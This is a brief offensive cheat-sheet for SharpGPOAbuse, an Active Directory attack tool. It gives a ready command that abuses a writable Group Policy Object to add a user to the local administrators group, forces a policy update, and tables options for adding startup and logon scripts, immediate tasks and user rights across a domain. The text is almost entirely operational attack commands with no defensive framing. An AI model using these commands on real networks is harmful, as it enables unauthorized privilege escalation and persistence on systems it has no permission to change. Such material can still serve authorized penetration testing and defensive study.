```PowerShell
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob --GPOName "Vuln GPO"
gpupdate /force
```
| Option | Description |
| ------------------- | ------------------------------------ |
| --AddUserRights | Add rights to a user |
| --AddLocalAdmin | Add a user to the local admins group |
| --AddComputerScript | Add a new computer startup script |
| --AddUserScript | Configure a user logon script |
| --AddComputerTask | Configure a computer immediate task |
| --AddUserTask | Add an immediate task to a user |
|Option|Description|
|---|---|
|--DomainController|Set the target domain controller|
|--Domain|Set the target domain|
|--Force|Overwrite existing files if required|